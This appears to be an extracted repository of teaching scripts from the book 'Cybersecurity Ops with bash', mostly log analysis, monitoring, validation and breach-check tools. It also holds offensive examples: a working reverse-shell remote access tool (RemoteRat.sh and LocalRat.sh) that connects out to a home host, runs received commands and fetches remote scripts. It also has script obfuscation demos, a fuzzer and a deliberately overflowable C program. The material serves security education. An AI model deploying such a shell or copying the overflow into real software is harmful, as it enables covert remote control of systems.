# default: Calc_VirusTotal.txt
#
RE='^.(.*)...\{.*detect..(.*),..vers.*result....(.*).,..update.*$' # <1>
FN="${1:-Calc_VirusTotal.txt}"
sed -e 's/{"scans": {/&\n /' -e 's/},/&\n/g' "$FN" | # <2>
while read ALINE
do
if [[ $ALINE =~ $RE ]] # <3>
then
VIRUS="${BASH_REMATCH[1]}" # <4>
FOUND="${BASH_REMATCH[2]}"
RESLT="${BASH_REMATCH[3]}"
if [[ $FOUND =~ .*true.* ]] # <5>
then
echo $VIRUS "- result:" $RESLT
fi
fi
done
================================================
FILE: ch12/tagit.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# tagit.sh
#
# Description:
# Place open and close tags around a string
#
# Usage:
# tagit.sh <tag> <string>
# <tag> Tag to use
# <string> String to tag
#
printf '<%s>%s</%s>\n' "${1}" "${2}" "${1}"
================================================
FILE: ch12/webdash.sh
================================================
#!/bin/bash -
#
# Rapid Cybersecurity Ops
# webdash.sh
#
# Description:
# Create an information dashboard
# Heading
# --------------
# 1-line of output
# --------------
# 5 lines of output
# ...
# --------------
# column labels and then
# 8 lines of histograms
# ...
# --------------
#
# some important constant strings
UPTOP=$(tput cup 0 0) # <1>
ERAS2EOL=$(tput el)
REV=$(tput rev) # reverse video
OFF=$(tput sgr0) # general reset
SMUL=$(tput smul) # underline mode on (start)
RMUL=$(tput rmul) # underline mode off (reset)
COLUMNS=$(tput cols) # how wide is our window
# DASHES='------------------------------------'
printf -v DASHES '%*s' $COLUMNS '-' # <2>
DASHES=${DASHES// /-}
#
# prSection - print a section of the screen
# print $1-many lines from stdin
# each line is a full line of text
# followed by erase-to-end-of-line
# sections end with a line of dashes
#
function prSection ()
{
local -i i # <3>
for((i=0; i < ${1:-5}; i++))
do
read aline
printf '%s%s\n' "$aline" "${ERAS2EOL}" # <4>
done
printf '%s%s\n%s' "$DASHES" "${ERAS2EOL}" "${ERAS2EOL}"
}
function cleanup() # <5>
{
if [[ -n $BGPID ]]
then
kill %1 # <6>
rm -f $TMPFILE
fi
} &> /dev/null # <7>
trap cleanup EXIT
# launch the bg process
TMPFILE=$(tempfile) # <8>
{ bash tailcount.sh $1 | \
bash livebar.sh > $TMPFILE ; } & # <9>
BGPID=$!
clear
while true
do
printf '%s' "$UPTOP"
# heading:
echo "${REV}Rapid Cyber Ops Ch. 12 -- Security Dashboard${OFF}" \
| prSection 1
#----------------------------------------
{ # <10>
printf 'connections:%4d %s\n' \
$(netstat -an | grep 'ESTAB' | wc -l) "$(date)"
} | prSection 1
#----------------------------------------
tail -5 /var/log/syslog | cut -c 1-16,45-105 | prSection 5
#----------------------------------------
{ echo "${SMUL}yymmdd${RMUL}" \
"${SMUL}hhmmss${RMUL}" \
"${SMUL}count of events${RMUL}"
tail -8 $TMPFILE
} | prSection 9
sleep 3
done
================================================
FILE: ch12/weblogfmt.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# weblogfmt.sh
#
# Description:
# Read in Apache web log and output as HTML
#
# Usage:
# weblogfmt.sh input.file > output.file
#
function tagit()
{
printf '<%s>%s</%s>\n' "${1}" "${2}" "${1}"
}
#basic header tags
echo "<html>" # <1>
echo "<body>"
echo "<h1>$1</h1>" #title
echo "<table border=1>" #table with border
echo "<tr>" #new table row
echo "<th>IP Address</th>" #column header
echo "<th>Date</th>"
echo "<th>URL Requested</th>"
echo "<th>Status Code</th>"
echo "<th>Size</th>"
echo "<th>Referrer</th>"
echo "<th>User Agent</th>"
echo "</tr>"
while read f1 f2 f3 f4 f5 f6 f7 f8 f9 f10 f11 f12plus # <2>
do
echo "<tr>"
tagit "td" "${f1}"
tagit "td" "${f4} ${f5}" # <3>
tagit "td" "${f6} ${f7}"
tagit "td" "${f9}"
tagit "td" "${f10}"
tagit "td" "${f11}"
tagit "td" "${f12plus}"
echo "</tr>"
done < $1
#close tags
echo "</table>"
echo "</body>"
echo "</html>"
================================================
FILE: ch13/bannergrabber.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# bannergrabber.sh
#
# Description:
# Automatically pull the banners from HTTP, SMTP,
# and FTP servers
#
# Usage: ./bannergrabber.sh hostname [scratchfile]
# scratchfile is used during processing but removed;
# default is: "scratch.file" or tempfile-generated name
#
#
function isportopen ()
{
(( $# < 2 )) && return 1 # <1>
local host port
host=$1
port=$2
echo >/dev/null 2>&1 < /dev/tcp/${host}/${port} # <2>
return $?
}
function cleanup ()
{
rm -f "$SCRATCH"
}
ATHOST="$1"
SCRATCH="$2"
if [[ -z $2 ]]
then
if [[ -n $(type -p tempfile) ]]
then
SCRATCH=$(tempfile)
else
SCRATCH='scratch.file'
fi
fi
trap cleanup EXIT # <3>
touch "$SCRATCH" # <4>
if isportopen $ATHOST 21 # FTP <5>
then
# i.e., ftp -n $ATHOST
exec 3<>/dev/tcp/${ATHOST}/21 # <6>
echo -e 'quit\r\n' >&3 # <7>
cat <&3 >> "$SCRATCH" # <8>
fi
if isportopen $ATHOST 25 # SMTP
then
# i.e., telnet $ATHOST 25
exec 3<>/dev/tcp/${ATHOST}/25
echo -e 'quit\r\n' >&3
cat <&3 >> "$SCRATCH"
fi
if isportopen $ATHOST 80 # HTTP
then
curl -LIs "https://${ATHOST}" >> "$SCRATCH" # <9>
fi
cat "$SCRATCH" # <10>
================================================
FILE: ch13/smtpconnect.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# smtpconnect.sh
#
# Description:
# Connect to a SMTP server and print welcome banner
#
# Usage:
# smtpconnect.sh <host>
# <host> SMTP server to connect to
#
exec 3<>/dev/tcp/"$1"/25
echo -e 'quit\r\n' >&3
cat <&3
================================================
FILE: ch14/askey.sh
================================================
# functions to convert decimal to ascii and vice-versa
# aschar - print the ascii character representation
# of the number passed in as an argument
# example: aschar 65 ==> A
#
function aschar ()
{
local ashex # <1>
printf -v ashex '\\x%02x' $1 # <2>
printf '%b' $ashex # <3>
}
# asnum - print the ascii (decimal) number
# of the character passed in as $1
# example: asnum A ==> 65
#
function asnum ()
{
printf '%d' "\"$1" # <4>
}
================================================
FILE: ch14/innerscript.sh
================================================
echo "This is an encrypted script"
echo "running uname -a"
uname -a
================================================
FILE: ch14/logfuscate.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# logfuscate.sh
#
# Description:
# Demonstration of logic obfuscation
#
f="$1" #<1>
a() (
b()
{
f="$(($f+5))" #<5>
g="$(($f+7))" #<6>
c #<7>
}
b #<4>
)
c() (
d()
{
g="$(($g-$f))" #<10>
f="$(($f-2))" #<11>
echo "$f" #<12>
}
f="$(($f-3))" #<8>
d #<9>
)
f="$(($f+$2))" #<2>
a #<3>
================================================
FILE: ch14/oneline.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# oneline.sh
#
# Description:
# Demonstration of one-line script obfuscation
#
if [[ $1 == "test" ]]; then echo "testing"; else echo "not testing"; fi; echo
"some command"; echo "another command"
================================================
FILE: ch14/readable.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# readable.sh
#
# Description:
# Simple script to be obfuscated
#
if [[ $1 == "test" ]]
then
echo "testing"
else
echo "not testing"
fi
echo "some command"
echo "another command"
================================================
FILE: ch14/streamcipher.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# streamcipher.sh
#
# Description:
# A lightweight implementation of a stream cipher
# Pedagogical - not recommended for serious use
#
# Usage:
# streamcipher.sh [-d] <key> < inputfile
# -d Decrypt mode
# <key> Numeric key
#
#
source ./askey.sh # <1>
#
# Ncrypt - Encrypt - reads in characters
# outputs 2digit hex #s
#
function Ncrypt () # <2>
{
TXT="$1"
for((i=0; i< ${#TXT}; i++)) # <3>
do
CHAR="${TXT:i:1}" # <4>
RAW=$(asnum "$CHAR") # " " needed for space (32) # <5>
NUM=${RANDOM}
COD=$(( RAW ^ ( NUM & 0x7F ))) # <6>
printf "%02X" "$COD" # <7>
done
echo # <8>
}
#
# Dcrypt - DECRYPT - reads in a 2digit hex #s
# outputs characters
#
function Dcrypt () # <9>
{
TXT="$1"
for((i=0; i< ${#TXT}; i=i+2)) # <10>
do
CHAR="0x${TXT:i:2}" # <11>
RAW=$(( $CHAR )) # <12>
NUM=${RANDOM}
COD=$(( RAW ^ ( NUM & 0x7F ))) # <13>
aschar "$COD" # <14>
done
echo
}
if [[ -n $1 && $1 == "-d" ]] # <15>
then
DECRYPT="YES"
shift # <16>
fi
KEY=${1:-1776} # <17>
RANDOM="${KEY}" # <18>
while read -r # <19>
do
if [[ -z $DECRYPT ]] # <20>
then
Ncrypt "$REPLY"
else
Dcrypt "$REPLY"
fi
done
================================================
FILE: ch14/synfuscate.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# synfuscate.sh
#
# Description:
# Demonstration of syntax script obfuscation
#
a () #<1>
{
local a="Local Variable a" #<2>
echo "$a"
}
a="Global Variable a" #<3>
echo "$a"
a
================================================
FILE: ch14/wrapper.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# wrapper.sh
#
# Description:
# Example of executing an encrypted "wrapped" script
#
# Usage:
# wrapper.sh
# Enter the password when prompted
#
encrypted='U2FsdGVkX18WvDOyPFcvyvAozJHS3tjrZIPlZM9xRhz0tuwzDrKhKBBuugLxzp7T
MoJoqx02tX7KLhATS0Vqgze1C+kzFxtKyDAh9Nm2N0HXfSNuo9YfYD+15DoXEGPd' #<1>
read -s word #<2>
innerScript=$(echo "$encrypted" | openssl aes-256-cbc -base64 -d -pass pass:"$word") #<3>
eval "$innerScript" #<4>
================================================
FILE: ch15/fuzzer.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# fuzzer.sh
#
# Description:
# Fuzz a specified argument of a program
#
# Usage:
# bash fuzzer.sh <executable> <arg1> [?] <arg3> ...
# <executable> The target executable program/script
# <argn> The static arguments for the executable
# '?' The argument to be fuzzed
# example: fuzzer.sh ./myprog -t '?' fn1 fn2
#
#
function usagexit () # <1>
{
echo "usage: $0 executable args"
echo "example: $0 myapp -lpt arg \?"
exit 1
} >&2 # <2>
if (($# < 2)) # <3>
then
usagexit
fi
# the app we will fuzz is the first arg
THEAPP="$1"
shift # <4>
# is it really there?
type -t "$THEAPP" >/dev/null || usagexit # <5>
# which arg to vary?
# find the ? and note its position
declare -i i
for ((i=0; $# ; i++)) # <6>
do
ALIST+=( "$1" ) # <7>
if [[ $1 == '?' ]]
then
NDX=$i # <8>
fi
shift
done
# printf "Executable: %s Arg: %d %s\n" "$THEAPP" $NDX "${ALIST[$NDX]}"
# now fuzz away:
MAX=10000
FUZONE="a"
FUZARG=""
for ((i=1; i <= MAX; i++)) # <9>
do
FUZARG="${FUZARG}${FUZONE}" # aka +=
ALIST[$NDX]="$FUZARG"
# order of >s is important
$THEAPP "${ALIST[@]}" 2>&1 >/dev/null # <10>
if (( $? )) ; then echo "Caused by: $FUZARG" >&2 ; fi # <11>
done
================================================
FILE: ch15/fuzzme.c
================================================
#include <stdio.h>
#include <string.h>
//Cybersecurity Ops with bash
//Warning - This is an insecure program and is for demonstration
//purposes only
int main(int argc, char *argv[])
{
char combined[50] = "";
strcat(combined, argv[1]);
strcat(combined, " ");
strcat(combined, argv[2]);
printf("The two arguments combined is: %s\n", combined);
return(0);
}
================================================
FILE: ch16/LocalRat.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# LocalRat.sh
#
# Description:
# Remote access tool to be on a local system,
# it listens for a connection from the remote system
# and helps with any file transfer requested
#
# Usage: LocalRat.sh port1 [port2 [port3]]
#
#
# define our background file transfer daemon
function bgfilexfer ()
{
while true
do
FN=$(nc -nlvvp $HOMEPORT2 2>>/tmp/x2.err) # <3>
if [[ $FN == 'exit' ]] ; then exit ; fi
nc -nlp $HOMEPORT3 < $FN # <4>
done
}
# -------------------- main ---------------------
HOMEPORT=$1
HOMEPORT2=${2:-$((HOMEPORT+1))}
HOMEPORT3=${3:-$((HOMEPORT2+1))}
# initiate the background file transfer daemon
bgfilexfer & # <1>
# listen for an incoming connection
nc -nlvp $HOMEPORT # <2>
================================================
FILE: ch16/RemoteRat.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# RemoteRat.sh
#
# Description:
# Remote access tool to be run on the remote system;
# mostly hands any input to the shell
# but if indicated (with a !) fetch and run a script
#
# Usage: RemoteRat.sh hostname port1 [port2 [port3]]
#
function cleanup ()
{
rm -f $TMPFL
}
function runScript ()
{
# tell 'em what script we want
echo "$1" > /dev/tcp/${HOMEHOST}/${HOMEPORT2} # <7>
# stall
sleep 1 # <8>
if [[ $1 == 'exit' ]] ; then exit ; fi
cat > $TMPFL </dev/tcp/${HOMEHOST}/${HOMEPORT3} # <9>
bash $TMPFL # <10>
}
# ------------------- MAIN -------------------
# could do some error checking here
HOMEHOST=$1
HOMEPORT=$2
HOMEPORT2=${3:-$((HOMEPORT+1))}
HOMEPORT3=${4:-$((HOMEPORT2+1))}
TMPFL="/tmp/$$.sh"
trap cleanup EXIT
# phone home:
exec </dev/tcp/${HOMEHOST}/${HOMEPORT} 1>&0 2>&0 # <1>
while true
do
echo -n '$ ' # <2>
read -r # <3>
if [[ ${REPLY:0:1} == '!' ]] # <4>
then
# it's a script
FN=${REPLY:1} # <5>
runScript $FN
else
# normal case - run the cmd
eval "$REPLY" # <6>
fi
done
================================================
FILE: ch19/pingmonitor.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# pingmonitor.sh
#
# Description:
# Use ping to monitor host availability
#
# Usage:
# pingmonitor.sh <file> <seconds>
# <file> File containing a list of hosts
# <seconds> Number of seconds between pings
#
while true
do
clear
echo 'Cybersecurity Ops System Monitor'
echo 'Status: Scanning ...'
echo '-----------------------------------------'
while read -r ipadd
do
ipadd=$(echo "$ipadd" | sed 's/\r//') #<1>
ping -n 1 "$ipadd" | egrep '(Destination host unreachable|100%)' &> /dev/null #<2>
if (( "$?" == 0 )) #<3>
then
tput setaf 1 #<4>
echo "Host $ipadd not found - $(date)" | tee -a monitorlog.txt #<5>
tput setaf 7
fi
done < "$1"
echo ""
echo "Done."
for ((i="$2"; i > 0; i--)) #<6>
do
tput cup 1 0 #<7>
echo "Status: Next scan in $i seconds"
sleep 1
done
done
================================================
FILE: ch20/softinv.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# softinv.sh
#
# Description:
# list the software installed on a system
# for later aggregation and analysis;
#
# Usage: ./softinv.sh [filename]
# output is written to $1 or <hostname>_softinv.txt
#
# set the output filename
OUTFN="${1:-${HOSTNAME}_softinv.txt}" # <1>
# which command to run depends on the OS and what's there
OSbase=win
type -t rpm &> /dev/null # <2>
(( $? == 0 )) && OSbase=rpm # <3>
type -t dpkg &> /dev/null
(( $? == 0 )) && OSbase=deb
type -t apt &> /dev/null
(( $? == 0 )) && OSbase=apt
case ${OSbase} in # <4>
win)
INVCMD="wmic product get name,version //format:csv"
;;
rpm)
INVCMD="rpm -qa"
;;
deb)
INVCMD="dpkg -l"
;;
apt)
INVCMD="apt list --installed"
;;
*)
echo "error: OSbase=${OSbase}"
exit -1
;;
esac
#
# run the inventory
#
$INVCMD 2>/dev/null > $OUTFN # <5>
================================================
FILE: ch21/test.input
================================================
file ./TODO.txt
!file ./validate.sh
!file nogo.sh
user albing
!user bob
group mysql
!group skip
hash a7f36f4519661cf2aaaf0ebf057f768fc35dafe8 validate.sh
hash b79f70b18538de0199e6829e06b547e079df8842 /bin/ls
================================================
FILE: ch21/validateconfig.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# validateconfig.sh
#
# Description:
# Validate a specified configuration exists
#
# Usage:
# validateconfig.sh < configfile
#
# configuration specification looks like:
# [[!]file|hash|reg|[!]user|[!]group] [args]
# examples:
# file /usr/local/bin/sfx - file exists
# hash 12384970347 /usr/local/bin/sfx - file has this hash
# !user bono - no user "bono" allowed
# group students - must have a students group
#
# errexit - show correct usage and exit
function errexit ()
{
echo "invalid syntax at line $ln"
echo "usage: [!]file|hash|reg|[!]user|[!]group [args]" # <1>
exit 2
} # errexit
# vfile - vaildate the [non]existance of filename
# args: 1: the "not" flag - value:1/0
# 2: filename
#
function vfile ()
{
local isThere=0
[[ -e $2 ]] && isThere=1 # <2>
(( $1 )) && let isThere=1-$isThere # <3>
return $isThere
} # vfile
# verify the user id
function vuser ()
{
local isUser
$UCMD $2 &>/dev/null
isUser=$?
if (( $1 )) # <4>
then
let isUser=1-$isUser
fi
return $isUser
} # vuser
# verify the group id
function vgroup ()
{
local isGroup
id $2 &>/dev/null
isGroup=$?
if (( $1 ))
then
let isGroup=1-$isGroup
fi
return $isGroup
} # vgroup
# verify the hash on the file
function vhash ()
{
local res=0
local X=$(sha1sum $2) # <5>
if [[ ${X%% *} == $1 ]] # <6>
then
res=1
fi
return $res
} # vhash
# a windows system registry check
function vreg ()
{
local res=0
local keypath=$1
local value=$2
local expected=$3
local REGVAL=$(query $keypath //v $value)
if [[ $REGVAL == $expected ]]
then
res=1
fi
return $res
} # vreg
#
# main
#
# do this once, for use in verifying user ids
UCMD="net user"
type -t net &>/dev/null || UCMD="id" # <7>
ln=0
while read cmd args
do
let ln++
donot=0
if [[ ${cmd:0:1} == '!' ]] # <8>
then
donot=1
basecmd=${cmd#\!} # <9>
fi
case "$basecmd" in
file)
OK=1
vfile $donot "$args"
res=$?
;;
hash)
OK=1
# split args into 1st word , remainder
vhash "${args%% *}" "${args#* }" # <10>
res=$?
;;
reg)
# Windows Only!
OK=1
vreg $args
res=$?
;;
user)
OK=0
vuser $args
res=$?
;;
group)
OK=0
vgroup $args
res=$?
;;
*) errexit # <11>
;;
esac
if (( res != OK ))
then
echo "FAIL: [$ln] $cmd $args"
fi
done
================================================
FILE: ch22/checkemail.1liner
================================================
#!/bin/bash
#
# checkemail.sh - check an email address against
# the Have I Been Pwned? database
# in 1 line
EMAILIN="$1"
if (( "$#" == 0 )) #<1>
then
printf 'Enter email address: '
read EMAILIN
fi
EMAILIN="https://haveibeenpwned.com/api/v2/breachedaccount/$EMAILIN"
echo 'Account pwned in the following breaches:'
curl -s "$EMAILIN" | grep -Po '"Name":".*?"' | cut -d':' -f2 | tr -d '\"' #<2>
================================================
FILE: ch22/checkemail.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# checkemail.sh
#
# Description:
# check an email address against the
# Have I Been Pwned? database
#
# Usage: ./checkemail.sh [<email>]
# <email> Email address to check; default: reads from stdin
#
if (( "$#" == 0 )) #<1>
then
printf 'Enter email address: '
read emailin
else
emailin="$1"
fi
pwned=$(curl -s "https://haveibeenpwned.com/api/v2/breachedaccount/$emailin") #<2>
if [ "$pwned" == "" ]
then
exit 1
else
echo 'Account pwned in the following breaches:'
echo "$pwned" | grep -Po '"Name":".*?"' | cut -d':' -f2 | tr -d '\"' #<3>
exit 0
fi
================================================
FILE: ch22/checkemailAlt.sh
================================================
#!/bin/bash
#
# checkemail.sh - check an email address against
# the Have I Been Pwned? database
#
if (( "$#" == 0 )) #<1>
then
printf 'Enter email address: '
read emailin
else
emailin="$1"
fi
URL="https://haveibeenpwned.com/api/v2/breachedaccount/$emailin"
pwned=$(curl -s "$URL" | grep -Po '"Name":".*?"' ) #<2>
if [ "$pwned" == "" ]
then
exit 1
else
echo 'Account pwned in the following breaches:' # <3>
pwned="${pwned//\"/}" # remove all quotes
pwned="${pwned//Name:/}" # remove all 'Name:'
echo "${pwned}"
exit 0
fi
================================================
FILE: ch22/checkpass.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# checkpass.sh
#
# Description:
# Check a password against the
# Have I Been Pwned? database
#
# Usage: ./checkpass.sh [<password>]
# <password> Password to check
# default: read from stdin
#
if (( "$#" == 0 )) #<1>
then
printf 'Enter your password: '
read -s passin #<2>
echo
else
passin="$1"
fi
passin=$(echo -n "$passin" | sha1sum) #<3>
passin=${passin:0:40}
firstFive=${passin:0:5} #<4>
ending=${passin:5}
pwned=$(curl -s "https://api.pwnedpasswords.com/range/$firstFive" | \
tr -d '\r' | grep -i "$ending" ) #<5>
passwordFound=${pwned##*:} #<6>
if [ "$passwordFound" == "" ]
then
exit 1
else
printf 'Password is Pwned %d Times!\n' "$passwordFound"
exit 0
fi
================================================
FILE: ch22/emailbatch.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# emailbatch.sh
#
# Description:
# Read in a file of email addresses and run them
# against Have I Been Pwned
#
# Usage: ./emailbatch.sh [<filename>]
# <filename> File with one email address on each line
# default: reads from stdin
#
cat "$1" | tr -d '\r' | while read fileLine #<1>
do
./checkemail.sh "$fileLine" > /dev/null #<2>
if (( "$?" == 0 )) #<3>
then
echo "$fileLine is Pwned!"
fi
sleep 0.25 #<4>
done
================================================
FILE: readme.txt
================================================
Cybersecurity Ops with bash
Attack, Defend, and Analyze from the Command Line
----------------------------------------------------------------------------------------
Scripts Version 1.0
----------------------------------------------------------------------------------------
About
----------------------------------------------------------------------------------------
All of the scripts and data referenced in the book are included with this file. The
number tags (i.e. <1>, <2>, <3>) contained in each script file corresponds to the
numbered callout explanations from within the book.
Script Robustness
----------------------------------------------------------------------------------------
The included scripts are written to illustrate and teach concepts. The
scripts are not designed to be efficient or robust enough for enterprise deployment.
Use caution if you choose to use the scripts in a live environment. Be sure to follow
programming best practices and test your scripts before deployment.
Disclaimer
----------------------------------------------------------------------------------------
The included scripts are provided "as is" and without any warranties or guarantees.
----------------------------------------------------------------------------------------
https://www.rapidcyberops.com
----------------------------------------------------------------------------------------
gitextract_c6os0si7/ ├── LICENSE ├── ch03/ │ ├── echoparams.sh │ └── osdetect.sh ├── ch04/ │ └── frost.txt ├── ch05/ │ ├── cmds.txt │ ├── cutfile.txt │ ├── getlocal.sh │ ├── hashsearch.sh │ ├── typesearch.sh │ └── winlogs.sh ├── ch06/ │ ├── accesstime.txt │ ├── awkusers.txt │ ├── book.json │ ├── book.xml │ ├── csvex.txt │ ├── ips.txt │ ├── passwords.txt │ ├── procowner.txt │ ├── tasks.txt │ ├── user.txt │ └── usernames.txt ├── ch07/ │ ├── access.log │ ├── countem.awk │ ├── countem.sh │ ├── histogram.sh │ ├── histogram_plain.sh │ ├── pagereq.awk │ ├── pagereq.sh │ ├── summer.sh │ ├── useragents.sh │ └── useragents.txt ├── ch08/ │ ├── livebar.sh │ ├── looper.sh │ ├── tailcount.sh │ └── wintail.sh ├── ch09/ │ ├── autoscan.sh │ ├── fd2.sh │ └── scan.sh ├── ch10/ │ └── baseline.sh ├── ch11/ │ ├── Calc_VT.txt │ ├── WannaCry_VT.txt │ ├── helloworld.c │ ├── vtjson.awk │ └── vtjson.sh ├── ch12/ │ ├── tagit.sh │ ├── webdash.sh │ └── weblogfmt.sh ├── ch13/ │ ├── bannergrabber.sh │ └── smtpconnect.sh ├── ch14/ │ ├── askey.sh │ ├── innerscript.sh │ ├── logfuscate.sh │ ├── oneline.sh │ ├── readable.sh │ ├── streamcipher.sh │ ├── synfuscate.sh │ └── wrapper.sh ├── ch15/ │ ├── fuzzer.sh │ └── fuzzme.c ├── ch16/ │ ├── LocalRat.sh │ └── RemoteRat.sh ├── ch19/ │ └── pingmonitor.sh ├── ch20/ │ └── softinv.sh ├── ch21/ │ ├── test.input │ └── validateconfig.sh ├── ch22/ │ ├── checkemail.1liner │ ├── checkemail.sh │ ├── checkemailAlt.sh │ ├── checkpass.sh │ └── emailbatch.sh └── readme.txt
SYMBOL INDEX (2 symbols across 2 files) FILE: ch11/helloworld.c function main (line 3) | int main() FILE: ch15/fuzzme.c function main (line 8) | int main(int argc, char *argv[])
Condensed preview — 71 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (137K chars).
[
{
"path": "LICENSE",
"chars": 1084,
"preview": "MIT License\n\nCopyright (c) 2019 Cybersecurity Ops with bash\n\nPermission is hereby granted, free of charge, to any person"
},
{
"path": "ch03/echoparams.sh",
"chars": 225,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# echoparams.sh\n#\n# Description: \n# Demonstrates accessing parameters in b"
},
{
"path": "ch03/osdetect.sh",
"chars": 363,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# osdetect.sh\n#\n# Description: \n# Distinguish between MS-Windows/Linux/Mac"
},
{
"path": "ch04/frost.txt",
"chars": 257,
"preview": "1 Two roads diverged in a yellow wood,\n2 And sorry I could not travel both\n3 And be one traveler, long I stood\n"
},
{
"path": "ch05/cmds.txt",
"chars": 625,
"preview": "#Linux Command |MSWin Bash |XML tag |Purpose\n#----------------+------------+-----------+--------------------------"
},
{
"path": "ch05/cutfile.txt",
"chars": 72,
"preview": "12/05/2017 192.168.10.14 test.html\n12/30/2017 192.168.10.185 login.html\n"
},
{
"path": "ch05/getlocal.sh",
"chars": 1583,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# getlocal.sh\n#\n# Description: \n# Gathers general system information and d"
},
{
"path": "ch05/hashsearch.sh",
"chars": 736,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# hashsearch.sh\n#\n# Description: \n# Recursively search a given directory f"
},
{
"path": "ch05/typesearch.sh",
"chars": 1636,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# typesearch.sh\n#\n# Description: \n# Search the file system for a given fil"
},
{
"path": "ch05/winlogs.sh",
"chars": 816,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# winlogs.sh\n#\n# Description: \n# Gather copies of Windows log files\n#\n# Us"
},
{
"path": "ch06/accesstime.txt",
"chars": 51,
"preview": "0745,file1.txt,1\n0830,file4.txt,2\n0830,file5.txt,3\n"
},
{
"path": "ch06/awkusers.txt",
"chars": 57,
"preview": "Mike Jones\nJohn Smith\nKathy Jones\nJane Kennedy\nTim Scott\n"
},
{
"path": "ch06/book.json",
"chars": 228,
"preview": "{ <1>\n \"title\": \"Cybersecurity Ops with bash\", <2>\n \"edition\": 1,\n \"authors\": [ <3>\n {\n \"firstName\": \"Paul\",\n"
},
{
"path": "ch06/book.xml",
"chars": 255,
"preview": "<book title=\"Cybersecurity Ops with bash\" edition=\"1\"> <1>\n <author> <2>\n <firstName>Paul</firstName> <3>\n <lastN"
},
{
"path": "ch06/csvex.txt",
"chars": 252,
"preview": "\"name\",\"username\",\"phone\",\"password hash\"\n\"John Smith\",\"jsmith\",\"555-555-1212\",5f4dcc3b5aa765d61d8327deb882cf99\n\"Jane Sm"
},
{
"path": "ch06/ips.txt",
"chars": 79,
"preview": "ip,OS\n10.0.4.2,Windows 8\n10.0.4.35,Ubuntu 16\n10.0.4.107,macOS\n10.0.4.145,macOS\n"
},
{
"path": "ch06/passwords.txt",
"chars": 425,
"preview": "password,md5hash\n123456,e10adc3949ba59abbe56e057f20f883e\npassword,5f4dcc3b5aa765d61d8327deb882cf99\nwelcome,40be4e59b9a2a"
},
{
"path": "ch06/procowner.txt",
"chars": 56,
"preview": "Process Owner;PID\njdoe;0\ntjones;4\njsmith;340\nmsmith;528\n"
},
{
"path": "ch06/tasks.txt",
"chars": 178,
"preview": "\nImage Name;PID;Session Name;Session#;Mem Usage\nSystem Idle Process;0;Services;0;4 K\nSystem;4;Services;0;2,140 K\nsmss.ex"
},
{
"path": "ch06/user.txt",
"chars": 75,
"preview": "user,ip\njdoe,10.0.4.2\njsmith,10.0.4.35\nmsmith,10.0.4.107\ntjones,10.0.4.145\n"
},
{
"path": "ch06/usernames.txt",
"chars": 24,
"preview": "1,jdoe\n2,puser\n3,jsmith\n"
},
{
"path": "ch07/access.log",
"chars": 65316,
"preview": "192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET / HTTP/1.1\" 200 2377 \"-\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko"
},
{
"path": "ch07/countem.awk",
"chars": 251,
"preview": "# Cybersecurity Ops with bash\n# countem.awk\n#\n# Description: \n# Count the number of instances of an item using awk\n#\n# U"
},
{
"path": "ch07/countem.sh",
"chars": 540,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# countem.sh\n#\n# Description: \n# Count the number of instances of an item "
},
{
"path": "ch07/histogram.sh",
"chars": 921,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# histogram.sh\n#\n# Description: \n# Generate a horizontal bar chart of spec"
},
{
"path": "ch07/histogram_plain.sh",
"chars": 783,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# histogram_plain.sh\n#\n# Description: \n# Generate a horizontal bar chart o"
},
{
"path": "ch07/pagereq.awk",
"chars": 465,
"preview": "# Cybersecurity Ops with bash\n# pagereq.awk\n#\n# Description: \n# Count the number of page requests for a given IP address"
},
{
"path": "ch07/pagereq.sh",
"chars": 514,
"preview": "# Cybersecurity Ops with bash\n# pagereq.sh\n#\n# Description: \n# Count the number of page requests for a given IP address "
},
{
"path": "ch07/summer.sh",
"chars": 369,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# summer.sh\n#\n# Description: \n# Sum the total of field 2 values for each u"
},
{
"path": "ch07/useragents.sh",
"chars": 1007,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# useragents.sh\n#\n# Description: \n# Read through a log looking for unknown"
},
{
"path": "ch07/useragents.txt",
"chars": 27,
"preview": "Firefox\nChrome\nSafari\nEdge\n"
},
{
"path": "ch08/livebar.sh",
"chars": 767,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# livebar.sh\n#\n# Description: \n# Creates a rolling horizontal bar chart of"
},
{
"path": "ch08/looper.sh",
"chars": 507,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# looper.sh\n#\n# Description: \n# Count the lines in a file being tailed -f\n"
},
{
